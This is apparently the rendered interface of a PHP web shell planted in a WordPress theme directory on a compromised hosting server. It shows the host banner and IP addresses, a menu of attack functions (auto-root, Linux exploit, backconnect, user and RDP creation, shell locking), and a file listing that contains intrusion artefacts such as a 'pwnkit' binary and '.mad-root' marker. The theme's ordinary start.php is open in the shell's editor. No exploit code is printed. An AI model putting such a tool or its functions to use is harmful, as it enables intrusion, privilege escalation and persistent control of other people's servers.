Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
neve /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
globals
[ DIR ]
drwxr-xr-x
gutenberg
[ DIR ]
drwxr-xr-x
header-footer-grid
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
108
B
-rw-r--r--
500.php
178
B
-rw-r--r--
CHANGELOG.md
14.71
KB
-rw-r--r--
LICENSE.txt
17.67
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
autoloader.php
4.05
KB
-rw-r--r--
comments.php
221
B
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
footer-pwa.php
147
B
-rw-r--r--
footer.php
535
B
-rw-r--r--
functions.php
2.76
KB
-rw-r--r--
functionsbak.php
2.28
KB
-rw-r--r--
header-pwa.php
680
B
-rw-r--r--
header.php
1.48
KB
-rw-r--r--
index.php
1.69
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
offline.php
178
B
-rw-r--r--
page.php
956
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.md
31.51
KB
-rw-r--r--
readme.txt
31.17
KB
-rw-r--r--
screenshot-mobile.png
17.77
KB
-rw-r--r--
screenshot.png
277.92
KB
-rw-r--r--
search.php
1.03
KB
-rw-r--r--
sidebar-shop.php
325
B
-rw-r--r--
sidebar.php
306
B
-rw-r--r--
single.php
1013
B
-rw-r--r--
start.php
1.21
KB
-rw-r--r--
style-rtl.css
57.57
KB
-rw-r--r--
style-rtl.min.css
46.39
KB
-rw-r--r--
style.css
57.6
KB
-rw-r--r--
style.min.css
46.36
KB
-rw-r--r--
toolset-config.json
4.33
KB
-rw-r--r--
wpml-config.xml
811
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : start.php
<?php /** * Start file handles bootstrap. * * @package Neve */ /** * Run theme functionality */ function neve_run() { $vendor_file = trailingslashit( get_template_directory() ) . 'vendor/autoload.php'; if ( is_readable( $vendor_file ) ) { require_once $vendor_file; } require_once 'autoloader.php'; $autoloader = new \Neve\Autoloader(); $autoloader->add_namespace( 'Neve', get_template_directory() . '/inc/' ); if ( defined( 'NEVE_PRO_SPL_ROOT' ) ) { $autoloader->add_namespace( 'Neve_Pro', NEVE_PRO_SPL_ROOT ); } $autoloader->register(); if ( class_exists( '\\Neve\\Core\\Core_Loader' ) ) { new \Neve\Core\Core_Loader(); } if ( class_exists( '\\Neve_Pro\\Core\\Loader' ) ) { /** * Legacy code, compatibility with old pro version. */ if ( is_file( NEVE_PRO_SPL_ROOT . 'modules/header_footer_grid/components/Yoast_Breadcrumbs.php' ) ) { require_once NEVE_PRO_SPL_ROOT . 'modules/header_footer_grid/components/Yoast_Breadcrumbs.php'; } if ( is_file( NEVE_PRO_SPL_ROOT . 'modules/header_footer_grid/components/Language_Switcher.php' ) ) { require_once NEVE_PRO_SPL_ROOT . 'modules/header_footer_grid/components/Language_Switcher.php'; } \Neve_Pro\Core\Loader::instance(); } } neve_run();
Close